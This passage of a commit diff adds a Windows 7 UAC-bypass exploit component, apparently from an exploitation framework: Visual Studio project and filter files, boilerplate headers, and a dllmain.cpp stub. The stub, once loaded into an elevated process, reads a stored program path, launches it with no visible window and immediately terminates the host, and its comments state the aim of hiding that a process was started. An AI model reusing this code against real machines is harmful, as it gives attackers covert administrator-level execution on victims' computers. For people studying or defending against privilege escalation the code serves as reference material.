<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

36
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.filters vendored Normal file
View File

@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllmain.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

3
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.user vendored Normal file
View File

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
</Project>

57
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp vendored Normal file
View File

@ -0,0 +1,57 @@
#include "stdafx.h"
#include <stdio.h>
#include ".\..\CMMN.h"
#include <stdlib.h>
#include <string>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
//
// Simple stub code that is used to create EXE within a alevated process.
// Wee need to hide fact that we've started process thats why we immediately
// Terminate host application.
//
CLogger::LogLine(TEXT("DLL: Hello"));
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
//
// Obtaining TIOR path to be used for CreateProcess call
//
std::wstring cmd;
CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd );
STARTUPINFO startupInfo = {0};
startupInfo.cb = sizeof(startupInfo);
PROCESS_INFORMATION processInfo = {0};
CLogger::LogLine(TEXT("DLL: TIOR shell="));
CLogger::LogLine(cmd);
//
// Create not visible window
//
if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
}
ExitProcess(-69);
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

8
external/source/exploits/bypassuac/Win7ElevateDll/stdafx.cpp vendored Normal file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// Win7ElevateDll.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

17
external/source/exploits/bypassuac/Win7ElevateDll/stdafx.h vendored Normal file
View File

@ -0,0 +1,17 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h>
// TODO: reference additional headers your program requires here
#include <assert.h>

8
external/source/exploits/bypassuac/Win7ElevateDll/targetver.h vendored Normal file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

17
external/source/exploits/bypassuac/stdafx.h vendored Normal file
View File

@ -0,0 +1,17 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h>
// TODO: reference additional headers your program requires here
#include <assert.h>

8
external/source/exploits/bypassuac/targetver.h vendored Normal file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>